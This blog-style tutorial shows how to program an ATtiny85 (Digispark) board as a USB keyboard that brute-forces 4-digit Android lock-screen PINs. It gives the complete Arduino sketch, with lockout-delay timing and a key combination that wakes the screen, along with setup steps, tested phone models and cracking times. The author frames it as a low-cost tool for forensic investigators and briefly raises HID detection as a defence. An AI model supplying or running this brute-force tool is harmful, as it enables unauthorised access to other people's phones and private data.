Mobile Lock Cracking/Brute-forcing with AT-Tiny85
For a long time, I’ve been wondering to crack mobile lock screen passwords. Well, with use of many Mobile Forensic Tools and Password Cracking tools that are available in the market does that thing but even commercial software comes with some limitations. So that leads to me search the web for cracking the mobile lock password by open source means and with less budget cause that costs a lot to buy these commercial tools. The web landed me to brute-forcing the mobile lock password with AT-Tiny85 board that is available for only 500 or max 550 rupees on Amazon. Well not only the board we have to look for the code as well cause the board is useless without the code. There are a number of videos and links that will provide the brute-forcing the code but there were some issues in them as well. I’ll discuss about them further and will tell you everything related to cracking the password of most of the mobile devices by brute-forcing the password.
First Question .. What is AT-Tiny85
As per this website http://digistump.com the definition of AT-Tiny85 board is
“ The Digispark is an Attiny85 based microcontroller development board similar to the Arduino line, only cheaper, smaller, and a bit less powerful. With a whole host of shields to extend its functionality and the ability to use the familiar Arduino IDE the Digispark is a great way to jump into electronics, or perfect for when an Arduino is too big or too much.”
You can also check the website for more specifications of the board. To perform the cracking part, I’ve not checked with Arduino UNO or Arduino Nano, but it would be great if someone reading this article would give these boards a try as well.
Second Question .. How AT-Tiny85 will be helping to achieve the cracking
I’ll be installing a simple Human Interface Device (HID) driver into the AT-Tiny85 board. With help of HID device, the device will not recognize it as a storage device and doesn’t prompt any authentication or access control type of notification in Mobile Device or Laptop/Desktop as well.
You may check whenever we connect a Keyboard or Mouse (eg. of HID), these doesn’t prompt any authentication or access control prompt. We simply connect the HID device and the system reads it and we start working with it. So, this simple methodology is applied here as well. The board is loaded with Digispark Modules which enables the board to work as a keyboard and mouse.
Note: The board can only work as a Keyboard or as a Mouse. If we are trying to load both the modules then it won’t work. For that, we can look for Adafruit TrinketCombo. Link for looking over the module https://github.com/adafruit/Adafruit-Trinket-USB/tree/master/TrinketHidCombo
Third Question .. When are we going to start with real Practical thing
For starters, we have to setup Arduino IDE in our Desktop/Laptop for building the code and installing the code in our board. You can download Arduino IDE for this link https://www.arduino.cc/en/Main/Software. After installing the IDE, our first step is to install the AT-Tiny85 board and the associated drivers in our IDE.
Cause at first, the board will not be recognized in the system as a device or anything, we have to install the drivers for it in our system. The link for downloading the drivers https://github.com/digistump/DigistumpArduino/releases/download/1.6.7/Digistump.Drivers.zip
After installing the driver, open Arduino IDE and move to the following option Menu > File > Preferences and insert the following json code for installing the Digispark AT-Tiny85 module in ArduinoIDE.
http://digistump.com/package_digistump_index.json
After this you are ready to go and select the Digispark AT-Tiny85 board from selection of boards.
This enables us to select the Digispark board and now we are ready to code and install it in our board.
Note: Do check if the board is showing at the bottom-right corner of the ArduinoIDE window with an assigned COM port. If not, then we’ll have to check for the installed driver and in Disk Management for re-installing the driver
The code to install in the board:
#include “DigiKeyboard.h”
int num[] = {39, 30, 31, 32, 33, 34, 35, 36, 37, 38};
int a=0;
int b=0;
int c=0;
int d=0;
int e=0;
int count=0;
bool key_stroke_e=false;
void setup() {
// put your setup code here, to run once:
DigiKeyboard.sendKeyStroke(0);
delay(2000);
}
void loop() {
// put your main code here, to run repeatedly:
if(count==5){
digitalWrite(1,HIGH);
DigiKeyboard.sendKeyStroke(40);
delay(34000);
DigiKeyboard.sendKeyStroke(40);
DigiKeyboard.sendKeyStroke(KEY_ENTER);
DigiKeyboard.sendKeyStroke(40);
DigiKeyboard.delay(3000);
DigiKeyboard.sendKeyStroke(KEY_SPACE,MOD_GUI_LEFT);
DigiKeyboard.delay(1000);
digitalWrite(1,LOW);
}
if(count>=10){
digitalWrite(1,HIGH);
DigiKeyboard.sendKeyStroke(40);
delay(34000);
DigiKeyboard.sendKeyStroke(40);
DigiKeyboard.sendKeyStroke(KEY_ENTER);
DigiKeyboard.sendKeyStroke(40);
DigiKeyboard.delay(3000);
DigiKeyboard.sendKeyStroke(KEY_SPACE,MOD_GUI_LEFT);
DigiKeyboard.delay(1000);
digitalWrite(1,LOW);
}
if(key_stroke_e==false){
DigiKeyboard.sendKeyStroke(num[a]);
DigiKeyboard.sendKeyStroke(num[b]);
DigiKeyboard.sendKeyStroke(num[c]);
DigiKeyboard.sendKeyStroke(num[d]);
}
DigiKeyboard.sendKeyStroke(40);
delay(1500);
d++;
count++;
if(d==10){
d=0;
c++;
if(c==10){
c=0;
b++;
if(b==10){
b=0;
a++;
if(a==10){
key_stroke_e=true;
}
}
}
}
}
Brief about the code
I’ll just give the brief about the code. The code is copied for various sources cause for sure I’m not a professional coder or programmers but yes I know some basics and how the program works so I can manipulate some things.
The initial assignment of variables and including the DigisparkKeyboard module. After assigning the variables, we setup the the Digispark module for once and then their is void loop from where the main part comes up which will be executed in loop. The first “count==5” states the first 5 attempts that we are going to try and then a pop up of “Try after 30 seconds” will come up and will wait for 34 seconds.
The real problem was to wait for 30 seconds and to unlock the screen when the screen is dim. The part was the fun part to play and I tried all the key patterns from keyboard to wake up the lock screen. The combination of “Window key plus the Spacebar” enables us to wakeup the lockscreen and prompt us with the lockscreen where we are going to try the passwords.
Then after 10 failed tries, the code will wait for 34 seconds after every failed attempt. And then the normal brute-force code that will start from 0000 to 9999.
Note: This code is actually tested and the board worked on devices like MotoG5, Redmi 4, Amazon Fire HD Tablet. I did try on Samsung Galaxy A5 and OnePlus Nord but may be there was some issue with Samsung jack and of course, I would say Oneplus Nord is one hard device to crack. And also, the lock timeout may differ according to the devices so, yes we can change the delay time and count as well in the code. The program is set for PIN passwords with 4 digits, but if we are dealing with more the 4 digits, again we can change the code as per the convenience.
The most important part to consider, there is option of “Data Wipe out” in Android after a number of failed attempts. But, I suppose no one enables that option for purpose cause for sure at some moment, everyone face such situation where we forget our password and also our evil friend may try to crack password by this mean and we do not want to “Wipe out” our data, so in general just take care of this as well.
The testing video is for “Educational purpose” only. The device tested is Moto G5s Plus. FYI, this took around 10 minutes to crack password 0018. For a 4 digit PIN, this would take around maximum 3~4 days depending upon the lock timeout. With a 6 digit PIN, this would go up to a week or so. Yes, this is a lot of time but suppose an investigator who is trying to gather deleted data or performing physical acquisition of the device but unable to perform because investigator is unable to crack the password and in worst scenario, even Chip-Off technique is performed, the data would be encrypted. So in this crucial event, maybe waiting for this much time is worthy enough with this low cost device then to let just skip the case.
Further Advancements
For all my readers, your suggestions and participation in this project is highly appreciated cause this script was tested on limited devices and only with PIN type lock pattern.
For eg, maybe the lock screen timeout for Oppo, Vivo, Realme or Samsung or any other brand may differ from the Moto G5s lock timeout and then the script would not be functional enough to perform the password cracking. Just suppose, we have a database in which it is defined that for any particular device the lock screen timeout is like after first 5 attempts that will prompt “30 seconds”, after next 5 tries (total 10 tries), the prompt will be of “5 minutes”, and after next 5 tries (total 15 tries), the prompt will be of “15 minutes‘, so we can make the versions of this script as per different manufacturers. This would make this more functional and will help the investigators accordingly.
Also, for the readers who are efficient in programming and coding, if we can modify this code for “Pattern” lock, this would do wonder because the main issue with Pattern lock comes with assigning the mouse pointer location and that position will be dependent on the screen resolution and size of the device. Well for that too, we require a database of every phone with their dimensions so we can configure the script.
Conclusion of the story
From this, it is totally clear that HID devices can be connected to any device whether Mobile or Laptop/Desktop with enabling the USB debugging and any User Access Control.
But at the same time, it can also be used not only for cracking passwords, but executing malicious scripts on Laptop/Desktop as many times these devices seems to be running without lock screen. And this could be performed in Mobile devices as well. So, we should be think of way to check the type of HID device and be able to determine from what type of device these commands are executed and whether that is a actual keyboard or a mouse. Also, for Digital Forensic enthusiasts, determining a case where the same device is used for cracking but with evil intentions, finding out the number of failed login attempts in a Mobile device would be a great evidence. If some one gets it, do share that in the comments.